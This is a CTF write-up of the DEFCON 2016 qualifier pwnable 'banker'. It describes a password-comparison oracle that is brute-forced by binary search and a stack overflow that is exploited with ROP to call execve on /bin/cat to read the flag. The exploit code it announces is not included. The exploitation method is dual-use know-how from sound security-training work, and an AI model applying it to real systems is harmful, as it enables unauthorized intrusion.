DEFCON 2016 CTF Quals pwnable banker writeup

Categories CTF

Banker is a big statically linked executable:

After the pain reversing the elf which contains 965 functions for about 8 hours(too slow)… I am clear what the server is doing and two vuls are found:

vul 1: When trying to login, if the username does not exist, the server will return error code=0; otherwise it will check the password byte by byte, if not equal, it will return 1 or -1 according to whether userinput is greater than password.

vul 2: A stack buffer overflow exist in the module which read username and password from /tmp/users.txt . If we login as admin and create a new user, we can smash the stack by log out and login again as the new user.


The exploit is easy, first use binary search to bruteforce the password within 49 times of try, then add a user with long password to trigger the stack overflow vulnerability. I do not know how to use shellcode, so i just ROP to construct a execve(“/bin/cat”,[“/bin/cat”,”flag”,NULL],0) call to get the flag.

You may wonder why not using execve(“/bin/sh”,0,0)? Because the server kills /bin/sh process and returns a lines: Segmentation Fault. This behavior is confusing at the first time.

the following is the exploit code:

This is the final data layout on data section when triggering int 80h:


No Comments

Leave a Reply